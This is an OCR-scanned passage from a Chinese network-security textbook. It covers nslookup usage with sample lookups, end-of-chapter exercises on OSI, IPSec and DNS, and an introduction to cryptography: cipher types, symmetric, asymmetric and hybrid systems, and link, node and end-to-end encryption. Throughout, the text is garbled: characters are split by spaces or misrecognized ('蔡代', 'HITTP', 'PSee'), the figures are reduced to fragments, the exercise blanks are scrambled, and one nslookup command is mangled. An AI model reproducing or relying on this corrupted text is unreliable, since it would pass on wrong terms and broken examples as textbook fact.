nslookup 工具 包含 在 Windows NT 和 Windows 2000 中 ， 并 总 是 随同 BIND 软件 包 一 
起 提供 。 它 可 以 提供 许多 选项 ， 并 提供 一 种 方法 从 头 到 尾 地 跟踪 DNS 查询 ， 是 用 来 进行 
手动 DNS 查询 最 常用 的 工具 。 这 个 独特 的 工具 具有 一 种 特性 : 既 可 以 模拟 标准 的 客户 解 
析 器 ， 也 可 以 模拟 服务 器 。 作 为 客户 解析 器 ，nslookup 可 以 直接 向 服务 器 查询 信息 。 而 用 
作 服 务 器 ，nslookup 可 以 实现 从 主 服务 器 到 辅 服务 器 的 区 域 传送 。 

nslookup 可 以 用 于 两 种 模式 ， 非 交互 模式 和 交互 模式 。 非 交互 模式 是 指 在 nslookup 命 
令 后 直接 加 所 要 查询 的 域名 或 主机 名 ; 交互 模式 是 指 输入 nslookup 命令 后 ， 出 现 提 示 符 
“>” 后 输入 相关 查询 内 容 。 任 何 一 种 模式 都 可 将 参数 传递 给 nslookup， 但 在 域名 服务 器 
出 现 故 障 时 更 多 地 会 使 用 交互 模式 。 

在 交互 模式 下 ， 可 以 在 提示 符 “>” 下 输入 “help” 或 “? ”来 获得 帮助 信息 。 执 行 
help 命令 将 提供 命令 的 基本 信息 。 非 交互 模式 下 对 nslookup 的 使 用 如 下 所 示 。 


Ci\> nslookup www.example.net 
Server: ns.win2000dns.com 
Address: 10.10.10.1 
Non-authoritative answer: 
Name: VENERA.ISI.EDU 
Address: 128.9.176.32 

Aliases: www.example.net 


在 本 地 主机 上 执行 nslookup 命令 ,默认 的 域名 服务 器 是 ns.win2000dns.com( 注 意 : 
win2000dns.com 这 个 地 址 只 是 个 例子 )。“Non-authoritative answer” 是 指 此 查询 是 从 缓存 
中 获得 回答 的 。 如 果 服 务 器 是 该 名 字 的 授权 服务 器 ， 这 一 行 就 不 会 出 现 。 

也 可 以 这 样 使 用 : nslookup www.example.net.venera.isiedu， 其 中 第 二 个 主机 名 是 用 于 
取代 默认 服务 器 的 。 可 以 看 到 现在 的 回答 是 授权 的 。 


Ci:\nslookup www.example.net 
Server: venera.isi.edu 
Address: 128.9.176.32 
Name: VENERA.ISI.EDU 
Address: 128.9.176.32 


Aliases: www.example.net 
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2.5 本 章 小 结 


在 这 一 章 中 讨论 了 网 络 安全 体系 结构 及 网 络 协 议 的 安全 性 ， 包 括 网 络 基本 协议 和 应 用 
协议 。 在 网 络 基本 协议 中 ， 主 要 介绍 了 TCP/IP 协议 族 的 相关 协议 安全 ， 网 络 协议 是 所 有 
网 络 应 用 安全 的 基础 ， 也 是 相关 网 络 安全 的 集合 ， 学 习 相关 网 络 协议 的 安全 性 知识 对 于 后 
续 的 网 络 安全 知识 的 了 解 将 起 到 很 大 的 帮助 作用 。 

此 外 ， 本 章 还 介绍 了 一 些 常见 的 网 络 操作 命令 。 


2.6 课 后 习题 


1. 填空 题 


(1) 
控 性 。 
(2) 


计算 机 网 络 安全 应 达到 的 目标 是 : 、 完 整 性 、 可 用 性 、 不 可 否认 性 和 可 


传输 层 主要 包括 传输 控制 协议 TCP 和 


2. 选择 题 (每 小 题 只 有 一 个 正确 答案 ) 


(D) 


(2) 


G3) 


(4) 


(G5) 


(6) 
个 级 别 。 


在 OSI 参考 模型 的 描述 中 ， 下 列 说 法 中 不 正确 的 是 (  )。 
A. OSI 参考 模型 定义 了 开放 系统 的 层次 结构 

B. OSI 参考 模型 是 一 个 在 制定 标准 时 使 用 的 概念 性 框架 
C. OSI 参考 模型 的 每 层 可 以 使 用 上 层 提供 的 服务 

D. OSI 参考 模型 是 开放 系统 互 连 参 考 模型 

IPSec 属于 ( 。”) 层 上 的 安全 机 制 。 


A. 传输 层 B. 应 用 层 

C. 数据 链 路 层 D. 网 络 层 

在 应 用 层 协议 中 ，( ”) 既 可 使 用 传输 层 的 TCP 协议 ， 又 可 用 UDP 协议 。 
A. SNMP B.DNS 

C. HITTP D.FTP 

E-mail 安全 传输 的 方法 称 为 (  )。 

A.TLS B. SA 安全 关联 组 

C. SMIME D: PSee 

要 想 知道 到 达 目 标 网 络 需 要 经 过 哪些 路 由 器 ， 应 该 使 用 ( ”) 命 令 。 
A.ping B. nslookup 

C. tracert D. ipconfig 


在 OSI 七 个 层次 的 基础 上 ， 将 安全 体系 划分 为 4 个 级 别 ， 以 下 ( 。”“) 不 属于 这 4 


A. 网 络 级 安全 B. 系统 级 安全 
C. 应 用 级 安全 D. 链 路 级 安全 
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3. 判断 题 


(1) 对 象 认证 (Entity Authentication) 安 全 服务 是 防止 被 动 攻击 的 重要 防御 措施 ， 它 对 
计算 机 网 络 系统 环境 中 的 各 种 信息 安全 有 重要 的 作用 。 ( 
(2) nbtstat 命 令 用 于 解析 硬件 地 址 。 ( 
(3) IPv6 网 络 中 不 需要 使 用 防火 墙 、 入 侵 检测 系统 等 传统 的 安全 设备 。 ( 
(4) IPSec 协议 不 仅仅 是 一 个 单独 的 协议 。 ( 


4. 简 答题 


(1) 简 述 OSI 参考 模型 之 间 的 安全 通信 所 必须 提供 的 安全 服务 和 安全 机 制 。 
(2) IPSec 的 安全 特性 主要 有 哪些 ? 
(3) 简 述 S-HTTP 支持 的 加 密 技术 和 算法 。 


i i Si 


目前 ， 密 码 技术 已 发 展 成 为 一 门 结合 数学 、 计 算 机 科学 、 电 子 
与 通信 、 微 电子 等 技术 的 交叉 学 科 。 使 用 密码 技术 不 仅 可 以 保证 信 
息 的 机 密 性 ， 还 可 以 保证 信息 的 完整 性 和 确定 性 ， 防 止 信息 被 纂 
改 、 伪 造 和 假冒 。 
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3.1 密码 技术 概述 


自古 以 来 ， 密 码 主要 应 用 于 军事 、 政 治 、 外 交 等 机 要 部 门 ， 因 而 密码 技术 的 研究 工作 
本 身 也 是 秘密 进行 的 。 然 而 随 着 计算 机 科学 、 通 信 技 术 、 微 电子 技术 的 发 展 ， 计 算 机 网 络 
的 应 用 进入 了 人 们 的 日 常生 活 和 工作 中 ， 从 而 产生 了 保护 隐私 、 敏 感 甚至 秘密 信息 的 需 
求 ， 而 且 这 样 的 需求 在 不 断 扩大 ， 于 是 密码 技术 的 应 用 和 研究 逐渐 公开 化 ， 并 呈现 出 了 空 
前 的 繁荣 。 


3.1.1 密码 技术 的 相关 概念 


密码 技术 是 网 络 安全 技术 的 核心 。 密 码 的 标准 、 算 法 、 协 议 、 密 钥 管 理 等 是 密码 技术 
研究 的 主要 内 容 。 


1. 基本 概念 


密码 技术 由 密码 编制 技术 和 密码 分 析 技 术 两 个 分 支 组 成 。 密 码 编制 技术 主要 研究 的 是 
通过 寻求 产生 高 安全 性 的 有 效 算 法 ， 来 满足 对 信息 进行 加 密 和 认证 的 需求 。 密 码 分 析 技术 
主要 研究 的 是 如 何 破译 密码 或 伪造 认证 码 。 密 码 编制 技术 和 密码 分 析 技 术 相 互 独立 又 相互 
促进 。 通 常 讲 的 密码 技术 是 指 密码 编制 技术 。 

下 面 是 密码 技术 中 常用 的 几 个 术语 。 

1) ”明文 (Plaintext) 

待 伪装 或 加 密 的 消息 (Message) 称 为 明文 ， 也 称 为 明码 。 在 通信 系统 中 它 可 能 是 比特 
流 ， 如 文本 、 位 图 、 数 字 化 的 语音 流 或 数字 化 的 视频 图 像 等 。 一 般 可 以 简单 地 认为 明文 是 
有 意义 的 字符 或 比特 集 ， 或 通过 某 种 公开 的 编码 标准 就 能 获得 的 消息 。 明 文 常用 m 或 p 
表示 。 

2)” 密 文 (Ciphertext) 

对 明文 施加 某 种 伪装 或 变换 后 的 输出 ， 也 可 认为 是 不 可 直接 理解 的 字符 或 比特 集 称 为 
密 文 ， 也 称 为 密码 ， 密 文 常用 c 表示 。 

3) ”加 密 (Encrypt) 

用 某 种 方法 对 信息 (明文 ) 进 行 伪装 以 隐藏 它 的 内 容 的 过 程 称 为 加 密 。 

4) ”解密 (Decrypt) 

把 已 加 密 的 信息 ( 密 文 ) 恢 复 成 原始 信息 (明文 ) 的 过 程 称 为 解密 ， 也 称 为 脱 密 。 

5) ”密码 算法 (Algorithm) 

密码 算法 指 加 密 和 解密 变换 的 规则 (数学 函数 )， 有 加 密 算法 和 解密 算法 两 种 。 

6) ” 密 钥 (Key) 

加 密 、 解 密 过 程 中 所 使 用 的 专门 信息 或 工具 称 为 密 钥 ， 通 常情 况 下 密 钥 就 是 一 系列 字 
符 串 。 加 密 时 使 用 的 密 钥 称 为 加 密 密 钥 ， 解 密 时 使 用 的 密 钥 称 为 解密 密 钥 。 

7) ”密码 技术 

密码 技术 是 指 对 存储 或 者 传输 的 信息 采取 秘密 交换 ， 以 防止 第 三 者 对 信息 窃取 的 技 
术 。 密 码 技术 分 为 加 密 和 解密 两 部 分 。 密 码 技术 的 基本 原理 就 是 伪装 信息 ， 即 对 信息 做 一 
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定 的 数学 变换 ， 使 不 知道 密 钥 的 用 户 不 能 解读 它 的 真正 含义 。 
2. 密码 系统 的 组 成 


一 个 密码 系统 是 由 以 下 5 个 部 分 组 成 的 五 元 组 MM、C、K、E、D)。 一 般 密码 系统 模 
型 ， 如 图 3-1 所 示 。 


e@ ”明文 空间 M。 
e 密 文 空间 C。 
e ” 密 钥 空间 K。 
e ”加 密 算法 E: 一 簇 由 加 密 密 钥 控制 的 、 从 M 到 C 的 加 密 变 换 。 
e 解密 算法 D: 一 簇 由 解密 密 钥 控 制 的 、 从 C 到 M 的 解密 变换 。 


密 文 C 
明文 明文 
一 人 | 加密 (E) 一 人 | 解 害 (D) 


| | 


3-1 一 般 密码 系统 模型 


对 于 密 钥 空间 中 的 任何 一 密 钥 ， 存 在 一 个 加 密 算法 E 和 解密 算法 D 使 得 Ex: MC 
和 Dk: C 一 M。 加 密 解密 函数 满足 : 
对 mEM, keEK， 有 : m=-D:(Ek(m))= D: * Ex(m) 
此 处 “。” 为 复合 运算 ， 因 此 要 求 : 
D: * Ex=I 
I 为 恒 等 变 换 ， 表 明 加 密 变 换 Ek 和 解密 变换 Di 是 互 逆 变 换 。 
在 图 3-1 中 ， 存 在 一 个 攻击 者 或 破译 者 能 够 从 普通 信道 上 拦截 到 密 文 C， 它 的 目标 是 
要 在 不 知道 密 钥 K 的 情况 下 ， 从 密 文 C 中 恢复 出 明文 M 或 密 钥 K。 
如 果 攻 击 者 可 以 仅 由 密 文 推出 明文 或 密 铀 ， 或 者 可 以 由 明文 和 密 文 推出 密 钥 ， 那 么 就 
称 该 密码 系统 是 可 破译 的 。 相 反 的 ， 则 称 该 密码 系统 是 不 可 破译 的 。 
一 个 安全 的 密码 系统 应 当 满 足下 面 的 条 件 : 
e@ ”从 截获 的 密 文 串 或 明文 与 密 文 串 对 ， 恢 复出 密 钥 或 任意 明文 串 ， 在 计算 机 上 应 该 
是 不 可 能 实现 的 ; 
系统 的 保密 性 仅 依赖 于 密 钥 而 不 依赖 于 对 加 密 体制 或 算法 的 保密 ; 
加 密 算法 和 解密 算法 应 该 适用 于 密 钥 空间 中 的 所 有 元 素 ; 
密码 系统 应 该 便于 实现 且 使 用 方便 。 


3. 密码 的 分 类 


根据 不 同 的 标准 ， 密 码 可 分 为 不 同 的 类 型 。 
1) ”替代 密码 和 移 位 密码 
根据 密码 转换 操作 的 方式 不 同 ， 密 码 可 分 为 蔡 代 密码 和 移 位 密码 。 
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替代 密码 是 指 先 建立 一 个 替换 表 ， 加 密 时 将 需要 加 密 的 明文 依次 通过 查 表 蔡 换 为 相应 
的 字符 ， 明 文字 符 被 逐个 蔡 换 后 ， 生 成 无 任何 意义 的 字符 串 ， 即 密 文 ， 蔡 代 密 码 的 密 钥 就 
是 其 替换 表 。 根 据 密码 算法 加 /解密 时 使 用 替换 表 的 多 少 ， 蔡 代 密 码 又 可 分 为 单 表 蔡 代 密 
码 和 多 表 蔡 代 密 码 。 

移 位 密码 也 称 为 换 位 密码 ， 是 指 将 明文 中 各 字符 的 位 置 重新 排列 得 到 密 文 的 一 种 密码 
体制 。 

2) “分 组 密码 和 序列 密码 

根据 对 明文 加 密 的 处 理 方式 不 同 ， 密 码 可 分 为 分 组 密码 和 序列 密码 。 

分 组 密码 又 称 为 块 密码 (Block Cipher)， 它 的 基本 原理 是 将 明文 分 成 固定 长 度 的 组 
( 块 )， 比 如 64 位 一 组 ， 用 相同 的 密 钥 和 算法 对 每 一 组 ( 块 ) 进 行 加 密 ， 输 出 结果 也 为 固定 长 
度 的 密 文 。 

序列 密码 又 称 为 流 密码 (Stream Cipher)， 它 首先 将 输入 的 原始 信息 转换 为 明文 数据 序 
列 ， 再 将 明文 数据 序列 与 密 钥 序列 进行 异 或 运算 ， 生 成 密 文 序列 发 送 给 接收 者 。 接 收 者 收 
到 密 文 序列 后 ， 用 相同 的 密 钥 序列 与 密 文 序列 进行 逐 位 解密 ( 异 或 运算 )， 恢 复出 明文 序 
列 。 加 密 / 解 密 的 密 钥 可 以 通过 一 个 比特 流 发 生 器 随机 产生 二 进 制 比特 流 得 到 。 序 列 密码 
的 安全 性 主要 由 随机 密 钥 序列 决定 。 

3) ”对 称 密 钥 密码 和 非 对 称 密 钥 密码 

根据 加 密 和 解密 过 程 中 密 钥 的 类 型 不 同 ， 密 码 可 以 分 为 对 称 密 钥 密码 和 非 对 称 密 钥 
密码 。 

如 果 加 密 操 作 和 解密 操作 使 用 的 是 相同 的 密 钥 ， 或 者 从 一 个 密 钥 易于 得 出 另 一 个 密 
钥 ， 这 样 的 系统 就 叫做 对 称 密 钥 密码 系统 。 在 这 种 系统 中 ， 加 密 和 解密 使 用 的 密 钥 都 是 需 
要 严格 保密 的 。 

如 果 加 密 过 程 中 使 用 的 密 钥 和 解密 过 程 中 使 用 的 密 钥 不 相同 ， 而 且 从 一 个 密 钥 难以 推 
断 出 男 一 个 密 钥 ， 这 样 的 密码 系统 称 为 非 对 称 密 钥 密码 系统 。 加 密 和 解密 过 程 中 使 用 的 不 
同 密 钥 ， 往 往 其 中 一 个 是 公开 的 ， 另 一 个 是 保密 的 。 


3.1.2 ”密码 体制 


完成 加 密 和 解密 的 算法 称 为 密码 体制 (Cipher System)。 密 码 体制 从 原理 上 可 分 为 三 大 
类 : 对 称 密码 体制 、 非 对 称 密码 体制 和 混合 加 密 体制 。 三 种 密码 体制 不 仅 用 于 数据 加 密 也 
用 于 消息 的 认证 。 

数据 加 密 或 解密 变换 过 程 ， 如 图 3-2 所 示 。 

1. 对 称 密码 体制 


对 信息 进行 明 / 密 变换 时 ， 加 密 与 解密 使 用 相同 密 钥 的 密码 体制 ， 称 为 对 称 密码 体 
制 。 在 这 种 技术 中 ， 加 密 和 解密 使 用 同一 密 钥 和 同一 算法 ， 而 且 发 送 方 和 接收 方 共享 密 钥 
和 算法 ， 对 称 密码 体制 的 安全 条 件 是 密 钥 必须 保密 。 对 称 密码 体制 模型 如 图 3-3 所 示 。 

对 称 密码 体制 的 安全 性 依赖 于 以 下 两 个 因素 : 

e ”加 密 算法 的 安全 性 。 加 密 算法 必须 是 足够 强 的 ， 仅 仅 基 于 密 文本 身 去 解密 信息 的 

要 求 在 实践 上 是 不 可 能 的 。 
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e ” 密 钥 的 秘密 性 。 加 密 方法 的 安全 性 不 是 依赖 于 算法 的 秘密 性 而 是 依赖 于 密 钥 的 秘 
密 性 。 


密 钥 玉 


图 3-3 对称 密码 体制 模型 


因此 ， 要 想 保证 对 称 密码 体制 的 安全 ， 必 须 保证 密 钥 不 被 泄露 。 在 实际 应 用 中 ， 对 称 
加 密 体 制 的 密 钥 通常 是 由 物理 途径 来 分 发 和 交换 的 。 

对 称 密码 体制 的 优点 是 加 密 / 解 密 算 法 实现 速度 快 ， 保 密 强度 高 ， 占 用 的 空间 小 。 它 
能 提供 的 服务 包括 : 认证 、 消 息 完整 性 和 机 密 性 三 项 服务 。 对 称 密码 体制 最 大 的 缺点 是 随 
着 网 络 规模 的 扩大 ， 密 钥 的 分 发 和 管理 非常 复杂 ， 比 如 对 于 具有 n 个 用 户 的 网 络 ， 需 要 
n(n-1)/2 个 密 钥 ， 因 此 当 用 户 群 很 大 ， 分 布 很 广 时 ， 密 钥 的 分 配 和 保存 代价 高 昂 。 对 称 密 
码 体制 的 另 一 个 缺点 是 无 法 解决 消息 确认 的 问题 ， 因 此 不 能 实现 数字 签名 。 


2. 非 对 称 密码 体制 


对 信息 进行 明 / 密 变换 时 ， 使 用 不 同 密 钥 的 密码 体制 称 为 非 对 称 密码 体制 。 非 对 称 密 
码 体 制 也 称 为 非 对 称 密 钥 密码 体制 、 公 开 密 钥 密码 体制 、 公 开 密 钥 加 密 系 统 、 公 钥 体 制 或 
双 钥 体制 。 非 对 称 密码 体制 是 由 美国 学 者 W.Diffie 和 M.Hellman 于 1976 年 首先 提出 的 。 
非 对 称 密码 体制 可 以 实现 数字 签名 。 

在 非 对 称 密码 体制 中 ， 每 个 用 户 都 具有 一 对 密 钥 ， 一 个 用 于 加 密 ， 一 个 用 于 解密 。 其 
中 加 密 密 钥 可 以 公开 ， 而 解密 密 钥 则 属于 用 户 的 私有 秘密 ， 只 有 用 户 一 个 人 知道 。 

非 对 称 密码 体制 模型 如 图 3-4 所 示 。 其 中 M 为 明文 ，C 为 密 文 ，Eb(M) 为 利用 B 的 加 
密 算法 加 密 M，De(C) 为 利用 B 的 解密 算法 解密 C。 
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图 3-4 ” 非 对 称 密码 体制 模型 

在 非 对称 密 码 体制 中 加 密 算法 E 和 解密 算法 D 必须 满足 三 点 要 求 : 

e D(E(M))=M， 使 用 解密 算法 DD 可 以 恢复 被 加 密 的 消息 ECMD) 为 原来 的 明文 M; 

@ 从 王 难 以 推出 D; 

@ 破译 者 使 用 明文 攻击 不 可 能 破解 E。 

非 对 称 密码 体制 的 工作 过 程 如 下 : 

假设 两 位 用 户 A 和 B 希望 接收 或 传送 保密 的 消息 。 

(1) 用 户 A 首先 设计 一 个 加 密 算法 E。 和 一 个 解密 算法 Ds， 当 然 算 法 满足 上 面 的 要 
求 。 然 后 ， 用 户 A 公开 加 密 算法 和 自己 的 公 钥 。 用 户 B 也 同样 公开 Es。 和 自己 的 公 钥 ， 保 
密 De 和 自己 的 密 钥 。 

(2) 在 用 户 A 和 用 户 B 之 间 建 立 一 个 通信 信道 。 假 设 用 户 A 的 公 钥 和 用 户 B 的 公 钥 
位 于 某 些 公开 的 文件 中 。 现 在 ， 用 户 A 取出 他 的 第 一 个 消息 M， 并 计算 Eo(M)， 然 后 将 结 
果 发 送 给 用 户 B。 用 户 B 接收 到 消息 后 ， 利 用 他 的 私 钥 对 消息 进行 解密 ， 即 计算 
Db(Eb(M))=M。 其 他 人 无 法 读 取 已 被 加 密 的 消息 Eo(M)。 

从 上 面 的 工作 过 程 可 以 看 出 ， 非 对 称 密码 体制 的 优点 是 通信 双方 不 需要 通过 建立 一 个 
安全 信道 来 交换 密 钥 ， 最 大 程度 上 保证 了 密 钥 不 被 泄露 ， 每 位 用 户 只 需要 一 对 公 钥 和 私 钥 
就 可 以 完成 通信 ， 密 钥 空间 大 大 减少 ， 避 免 了 繁琐 的 密 钥 管理 。 缺 点 是 非 对称 密 码 体制 的 
实现 速度 比较 慢 ， 不 适应 于 通信 负荷 较 重 的 应 用 。 因 此 ， 非 对 称 密码 体制 可 以 用 来 加 密 关 
键 性 的 、 核 心 的 机 密 数据 ， 而 对 称 密码 体制 通常 被 用 于 数据 量 大 的 加 密 。 


3. 混合 加 密 体制 


对 称 密码 体制 的 特点 是 算法 简单 ， 加 密 / 解 密 运算 速度 快 ， 但 其 密 钥 管理 复杂 ， 不 便 
于 数字 签名 。 而 非 对 称 密码 体制 的 特点 是 密 钥 管理 简单 ， 便 于 数字 签名 ， 但 算法 的 理论 复 
杂 ， 加 密 / 解 密 运 算 速度 慢 。 因 此 ， 在 实际 应 用 中 ， 经 常 采 用 对 称 密码 体制 和 非 对 称 密码 
体制 相 结合 (混合 ) 的 方式 ， 如 图 3-5 所 示 。 

混合 加 密 体制 的 工作 过 程 如 下 : 

假设 用 户 A 与 用 户 B 要 实现 保密 通信 。 首 先 用 户 A 找到 用 户 B 的 公 钥 ， 然 后 选择 一 
个 大 随机 数 作为 此 次 会 话 的 加 密 密 钥 ， 即 会 话 密 钥 ， 会 话 密 钥 只 在 此 次 会 话 期 间 有 效 。 用 
户 A 以 会 话 密 钥 作为 秘密 密 钥 ， 采 用 对 称 密码 算法 作为 加 密 算 法 ， 对 会 话 信息 加 密 得 到 
会 话 密 文 。 然 后 ， 用 户 A 使 用 用 户 B 的 公 钥 对 会 话 密 钥 进行 加 密 ， 利 用 非 对 称 密码 算法 
为 加 密 算法 ， 得 到 会 话 密 钥 的 密 文 。 最 后 ， 用 户 A 将 会 话 密 钥 的 密 文 及 会 话 密 文 发 送 给 
用 户 B。 

用 户 B 在 收 到 用 户 A 发 来 的 密 文 后 ， 首 先 输入 自己 的 私 钥 ， 利 用 解密 算法 恢复 出 会 
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话 密 钥 ， 然 后 用 会 话 密 钥 恢 复出 会 话 的 内 容 ， 此 时 会 话 密 钥 的 分 配 及 一 次 会 话 过 程 就 完 


成 了 。 
8 的 公家 5 的 私 棚 * 


加 密 后 的 * 
对 称 客 钥 * 


加 宣 ( 公 。 解 室 ( 公 。 有 
宪 记 | 一 | 引流 | 一 一 > | a | 一 也 | 万 . 
| 明文 ， 
C 
| 3 
二 称 算法 ) 


3-5 ”混合 加 密 体制 模型 


由 此 可 见 ， 采 用 将 非 对 称 和 对 称 密码 相 结合 的 混合 加 密 体制 ， 不 仅 可 以 解决 加 密 / 解 
密 速度 的 问题 ， 而 且 又 能 有 效 的 解决 密 钥 分 发 的 问题 。 与 此 同时 ， 每 次 传送 的 数据 都 可 由 
发 送 方 选 定 不 同 的 密 钥 来 进行 加 密 ， 因 此 可 以 更 好 地 保证 数据 通信 的 安全 性 。 混 合 加 密 体 
制 无 疑 是 目前 解决 网 络 传输 信息 安全 的 一 种 比较 好 的 方法 。 


3.1.3 数据 加 密 方式 
1. 块 加 密 及 流 加 密 


根据 被 加 密 的 数据 形式 不 同 ， 可 以 将 密 钥 加 密 技术 分 为 块 加 密 和 流 加 密 。 

e@ ” 块 加 密 ， 是 指 对 定 长 的 数据 块 进行 加 密 ， 数 据 块 之 间 的 关系 不 依赖 于 加 密 过 程 。 
也 就 是 说 ， 当 两 个 数据 块 内 容 相同 时 ， 无 论 加 密 过 程 中 的 顺序 怎样 ， 得 到 的 密 文 
也 应 完全 相同 。 

e 流 加 密 ， 是 指数 据 流 的 加 密 ， 加 密 过 程 带 有 反馈 性 ， 即 前 一 字 节 加 密 的 结果 作为 
后 一 字 节 加 密 的 密 钥 。 当 两 个 数据 块 内 容 相同 时 ， 只 要 加 密 过 程 中 的 顺序 不 同 
得 到 的 密 文 就 有 所 不 同 。 可 见 ， 流 加 密 方式 具有 更 强 的 安全 性 。 


2. 网 络 加 密 


网 络 加 密 可 以 在 OSI 七 层 协议 的 多 层 上 实现 ， 主 要 有 3 种 方式 : 链 路 加 密 、 节 点 对 节 
点 加 密 和 端 对 端 加 密 。 

1)” 链 路 加 密 

链 路 加 密 (又 称 在 线 加 密 ) 是 指 传输 数据 仅 在 数据 链 路 层 上 进行 加 密 。 链 路 加 密 方式 如 
图 3-6 所 示 。 它 可 以 对 两 相 邻 节点 之 间 链 路 上 传输 的 数据 进行 保护 。 链 路 加 密 只 需要 把 两 
个 密码 设备 安装 在 两 个 节点 间 的 线路 上 ， 并 装 有 同样 的 密 钥 即 可 。 微 波 、 卫 星 以 及 有 线 介 
质 等 链 路 都 可 以 采用 链 路 加 密 方式 。 

链 路 加 密 时 在 链 路 上 传输 的 信息 是 密 文 ， 包 括 信息 正文 、 路 由 及 检验 码 等 控制 信息 ， 
而 链 路 间 的 节点 上 因为 要 进行 路 径 选择 ， 因 此 路 由 信息 必须 是 明文 。 这 样 ， 为 了 进行 路 由 
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选择 和 差错 检测 ， 信 息 在 中 间 节 点 上 要 先进 行 解 密 ， 以 获得 路 由 信息 和 检验 码 ， 然 后 再 被 
加 密 ， 送 至 下 一 链 路 。 同 一 节点 上 的 解密 和 加 密 密 钥 是 不 同 的 。 


节点 1 节点 2 节点 3 
M M M 
| 
El Di By D: Es 
下 Ll 


图 3-6 链 路 加 密 方式 


链 路 加 密 方式 的 优 缺 点 如 下 : 

e@ 加密 对 用 户 是 透明 的 ， 通 过 链 路 发 送 的 所 有 消息 在 发 送 前 都 需要 先 被 加 密 。 

e ”每 个 链 路 只 需要 一 对 密 钥 。 

e ”提供 了 信号 流 安全 机 制 。 

e@ ”缺点 是 数据 在 中 间 节 点 上 以 明文 形式 出 现 ， 维 护 节点 安全 性 代价 昂贵 。 

2) ”节点 对 节点 加 密 

节点 加 密 是 指 在 信息 传输 路 过 的 节点 处 进行 解密 和 加 密 。 节 点 加 密 的 原理 图 如 图 3-7 
所 示 ， 它 是 对 链 路 加 密 的 改进 ， 目 的 是 克服 链 路 加 密 在 节点 处 易 遭 非法 存 取 的 缺点 。 


二 二 ~ 节点 (ws ) 目的 节点 
(交换 中 心 ) 


图 3-7 节点 加 密 的 原理 图 


节点 加 密 是 在 协议 传输 层 上 进行 的 加 密 ， 可 以 对 源 节点 和 目的 节点 之 间 传 输 的 数据 进 
行 加 密 保护 。 它 与 链 路 加 密 类 似 ， 只 是 加 密 算 法 要 组 合 在 依附 于 节点 的 加 密 模块 之 中 。 

该 加 密 方式 可 提供 用 户 节 点 间 连 续 的 安全 服务 ， 也 可 用 于 实现 对 等 实体 的 鉴别 。 节 点 
加 密 也 是 每 条 链 路 使 用 一 个 专用 密 钥 ， 但 一 个 密 钥 到 另 一 个 密 钥 的 变换 是 在 保密 模块 中 进 
行 的 。 该 模块 设 在 节点 中 央 处 理 装置 中 ， 可 以 起 到 外 围 设备 的 作用 。 因 此 明文 数据 不 通过 
节点 ， 而 是 只 存储 于 保密 模块 中 。 使 用 节点 加 密 需 要 注意 的 是 ， 对 于 相当 多 的 电报 数据 ， 
在 路 由 选择 时 也 要 加 密 。 这 样 ， 节 点 中 央 处 理 装置 就 能 够 恰当 地 选 定数 据 的 发 送 线路 。 

3) ” 端 对 端 加 密 

端 对 端 加 密 是 指 在 协议 应 用 层 上 完成 的 加 密 。 端 对 端 加 密 是 对 两 个 通信 的 端点 用 户 之 
间 进 行 数据 的 加 密 / 解 密 ， 通 过 加 密 对 用 户 之 间 传 送 的 数据 提供 保护 ， 保 证 数据 的 安全 。 
数据 在 初始 节点 上 被 加 密 ， 直 到 目的 节点 时 才能 被 解密 ， 在 中 间 节 点 和 链 路 上 数据 均 以 密 
文 形式 传输 。 端 对 端 加 密 方式 如 图 3-8 所 示 。 

端 对 端 加 密 只 有 在 发 送 端 和 接收 端 才 有 加 密 和 解密 设备 ， 中 间 各 节点 不 需要 有 密码 设 
备 。 所 以 端 对 端 加 密 对 数据 的 保护 是 连续 的 ， 它 可 以 提供 较 高 水 平 的 数据 安全 。 
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节点 1 节点 2 节点 3 节点 


图 3-8 ” 端 对 端 加 密 方式 


在 一 个 数据 通信 网 中 ， 采 用 端 对 端 加 密 ， 一 个 端点 用 户 与 每 一 个 对 方 端点 用 户 之 间 通 
信 ， 必 须 拥有 专用 的 密 钥 ， 还 需要 用 户 之 间 有 可 换 密 钥 的 协议 。 密 钥 由 双方 事先 约定 ， 也 
可 通过 系统 动态 产生 ， 此 密 钥 仅 在 一 次 通信 期 间 有 效 。 同 时 ， 用 户 之 间 还 需要 有 适合 的 密 
码 算 法 。 由 于 通信 链 路 中 的 每 个 中 间 节 点 ， 为 了 把 报 文 传送 到 指定 的 目的 地 ， 必 须 检查 路 
由 选择 信息 ， 因 此 端 对 端 加 密 只 能 对 报 文 加 密 ， 不 能 对 路 由 选择 信息 加 密 。 
端 对 端 加 密 方式 的 优 缺 点 如 下 : 
e ”成 本 低 。 由 于 端 对 端 加 密 可 以 确保 数据 到 达 目 的 地 之 前 始终 使 用 密 钥 加 密 保护 ， 
因此 仅 要 求 发 送 节点 和 目的 节点 具有 加 密 / 解 密 设备 。 
e@ ”安全 性 高 。 控 制 中 心 的 加 密 设备 可 以 对 文件 、 通 行 字 以 及 系统 常 驻 数 据 起 到 保护 
作用 。 
@ ”缺点 是 由 于 端 对 端 加 密 只 能 对 报 文 加 密 ， 数 据 报头 仍然 保持 明文 形式 ， 所 以 数据 
容易 为 报 文 分 析 者 所 利用 。 而 且 端 对 端 加 密 密 钥 的 数量 大 ， 密 钥 管理 成 本 昂贵 。 
3. 数据 加 密 的 实现 方式 
网 络 中 的 数据 加 密 可 以 采用 两 种 途径 : 一 种 是 通过 硬件 实现 数据 加 密 ， 另 一 种 是 通过 
软件 实现 数据 加 密 。 通 过 硬件 实现 网 络 数据 加 密 有 三 种 方式 ， 链 路 加 密 、 节 点 加 密 和 端 对 
端 加 密 ， 软 件数 据 加 密 就 是 指使 用 加 密 算 法 进行 的 加 密 。 
(1) 硬件 加 密 : 所 有 加 密 产 品 都 有 特定 的 硬件 形式 。 这 些 加密 和 解密 硬件 被 嵌入 到 通 
信 线 路 中 ， 然 后 对 所 有 通过 的 数据 进行 加 密 。 虽 然 软件 加 密 很 流行 ， 但 硬件 加 密 仍 是 商业 
和 军事 等 领域 应 用 的 主要 选择 。 选 用 硬件 加 密 的 原因 有 : 
e ”加 密 速度 快 。 加 密 算法 中 含有 许多 复杂 运算 ， 采 用 硬件 方式 实现 其 功能 将 提高 处 
理 速度 ， 而 用 软件 实现 这 些 复杂 运算 将 影响 速度 。 
e ”安全 性 高 。 使 用 硬件 加 密 设备 可 将 加 密 算法 封装 保护 ， 以 防止 被 修改 。 
e@ ”便于 安装 。 将 专用 加 密 硬件 放 在 电话 、 传 真 机 中 比 设置 在 微 处 理 器 中 实现 更 方 
便 。 安 装 一 个 加 密 设备 比 修改 配置 计算 机 系统 软件 更 容易 。 
